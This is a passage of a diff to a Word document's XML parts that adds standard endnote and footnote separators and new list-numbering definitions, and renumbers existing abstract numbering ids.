+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
@@ -2231,6 +3347,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2964194A"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="D7021A94"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3762685E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5456D60E"/>
@@ -2379,7 +3608,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="397F064C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="94BC9012"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3E2C586D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="445E341A"/>
@@ -2496,7 +3874,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41495812"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1F24FBE"/>
@@ -2645,7 +4023,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="47F0156F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1390FD74"/>
@@ -2758,7 +4136,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48147DBA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="59F8FA30"/>
@@ -2907,7 +4285,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48826219"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="23F60560"/>
@@ -3056,7 +4434,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4BCA3A0D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BA143F50"/>
@@ -3145,7 +4523,156 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50131C7B"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="8C5289DC"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="561B161F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A64578A"/>
@@ -3294,7 +4821,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5ECB57B5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3DAB198"/>
@@ -3380,7 +4907,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6267650E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1486BBBA"/>
@@ -3529,7 +5056,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="686A7968"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF642DA8"/>
@@ -3678,7 +5205,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="695E02A4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1B76F0F0"/>
@@ -3827,7 +5354,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CDF7FB3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7084172C"/>
@@ -3976,7 +5503,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEC6A36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2C88B578"/>
@@ -4065,7 +5592,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7168611A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1808E96"/>
@@ -4178,7 +5705,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76AF5C5E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3FAAE8C2"/>
@@ -4267,7 +5794,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="772F064C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B224C640"/>
@@ -4382,10 +5909,10 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
